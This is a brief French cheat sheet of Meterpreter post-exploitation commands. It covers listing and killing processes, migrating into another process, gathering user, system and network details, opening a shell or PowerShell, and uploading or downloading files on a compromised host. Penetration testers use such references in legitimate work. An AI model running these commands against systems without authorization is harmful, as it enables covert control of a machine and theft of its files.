% meterpreter, help, cmd

# Lister les processus
run <TYPE> ps

# Migration d'une instance serveur vers un autre processus => migrate <PID>
run <TYPE> migrate <PID>

# Tuer un processus
run <TYPE> kill <PID>

# Obtenir l'utilisateur actuel
run <TYPE> getuid

# Obtenir des informations sur le système
run <TYPE> sysinfo

# Obtenir la liste de routage
run <TYPE> route

# Lister les interfaces réseaux et leurs configurations
run <TYPE> ipconfig

# Obtenir le shell
run <TYPE> shell

# Charger le module powershell
run <TYPE> load powershell

# Démarrer powershell
run <TYPE> powershell_shell

# Upload/Download fichier
run <TYPE> upload/download <FILE> <FILE_OUTPUT>

$ FILE: ls
$ TYPE: run <TYPE> "all,copy,view,exec" | tr ',' '\n'